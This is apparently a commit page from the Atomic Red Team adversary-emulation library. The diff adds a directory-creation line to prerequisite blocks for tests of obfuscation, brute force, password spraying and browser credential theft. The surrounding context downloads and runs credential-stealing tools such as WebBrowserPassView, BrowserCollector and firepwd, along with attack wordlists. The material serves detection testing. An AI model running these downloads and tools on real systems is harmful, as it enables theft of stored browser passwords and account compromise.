Added ExternalPayloads directory (#2545)

* Added ExternalPayloads dir creation * Created ExternaPayloads Dir Created ExternaPayloads Directory using powershell command * Added External Payloads Dir Added External Payloads Directory using a powershell command for all Procedures. * Fixed ExternalPayload directory creation Fixed ExternalPayload directory creation. Got rid of the Split path * Created External Payloads directory Created External Payloads directory for procedure 14d55ca0-920e-4b44-8425-37eedd72b173 * Update T1003.002.yaml Added ExternalPayloads directory creation PowerShell command for procedure 804f28fc-68fc-40da-b5a2-e9d0bce5c193 * Update T1110.004.yaml Added Powershell Command to creat ExternalPayloads dir for the second prereq for procedure 4852c630-87a9-409b-bb5e-5dc12c9ebcde. * Update T1110.001.yaml Added ExrernalPayload directory creation PowerShell command for procedure 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4 prereq 2 * Added ExternalPayloads Dir Added Powershell command to create new ExternalPayloads dir for procedure fad04df1-5229-4185-b016-fb6010cd87ac * Add ExternalPayloads Dir Added PowerShell Command to create new ExternalPayloads directory for procedure c6f25ec3-6475-47a9-b75d-09ac593c5ecb * Added prereq download directories Added powershell command to create prereq download directories for procedure 6f2c5c87-a4d5-4898-9bd1-47a55ecaf1dd --------- Co-authored-by: Carrie Roberts <[email protected]>
redcanaryco · Sep 29, 2023 · f68822b · f68822b
1 parent 273e3c0
commit f68822b
Show file tree

Hide file tree

Showing 4 changed files with 10 additions and 0 deletions.
diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml
@@ -235,6 +235,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js") {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       Invoke-WebRequest "#{url_path}" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1027js.zip"
       Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\T1027js.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\" -Force

diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml
@@ -146,6 +146,7 @@ atomic_tests:
     prereq_command: |
       if (test-path "PathToAtomicsFolder\..\ExternalPayloads\bruteuser.txt"){exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
       invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/src/bruteuser.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\bruteuser.txt"
   executor:
     name: powershell

diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml
@@ -283,6 +283,7 @@ atomic_tests:
     prereq_command: |
       if (test-path "PathToAtomicsFolder\..\ExternalPayloads\passwordspray.txt"){exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
       invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/src/passwordspray.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\passwordspray.txt"
   executor:
     name: powershell

diff --git a/atomics/T1555.003/T1555.003.yaml b/atomics/T1555.003/T1555.003.yaml
@@ -23,6 +23,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path "#{file_path}\SysInternals") {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip"
       Expand-Archive "#{file_path}\Modified-SysInternalsSuite.zip" "#{file_path}\sysinternals" -Force
@@ -225,6 +226,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
       Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
   - description: |
       Firefox profile directory must be present
@@ -243,13 +245,15 @@ atomic_tests:
     prereq_command: |
       if (Test-Path "#{VS_CMD_Path}") {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
       invoke-webrequest "https://aka.ms/vs/17/release/vs_BuildTools.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\VS_BuildTools.exe"
       write-host "Visual Studio Build Tools (Desktop Development with C++) must be installed manually. Please run the installer from PathToAtomicsFolder\..\ExternalPayloads\VS_BuildTools.exe."
   - description: |
       Python must be installed
     prereq_command: |
       if (Test-Path "#{Python_Path}") {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
       invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
       Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
   - description: |
@@ -258,6 +262,7 @@ atomic_tests:
       $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
       if (pip -v) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
       invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"      
       invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
       cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"
@@ -408,6 +413,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path "#{webbrowserpassview_path}") {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\T1555.003\bin\" -ErrorAction ignore -Force | Out-Null
       Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1555.003/bin/WebBrowserPassView.exe -OutFile "#{webbrowserpassview_path}"
   executor:
     command: |
@@ -441,6 +447,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path "PathToAtomicsFolder\T1555.003\bin\BrowserCollector.exe") {exit 0} else {exit 1}
     get_prereq_command: |-
+      New-Item -Type Directory "PathToAtomicsFolder\T1555.003\bin\" -ErrorAction Ignore -Force | Out-Null
       Invoke-WebRequest "https://github.com/SaulBerrenson/BrowserStealer/releases/download/1.0.0.4/BrowserCollector_x64.exe" -Outfile: "PathToAtomicsFolder\T1555.003\bin\BrowserCollector.exe"
   - description: |
       Login Data file that is a copy of a chrome Login Data that contains credentials for the tool to "steal." Must exist at the specified path.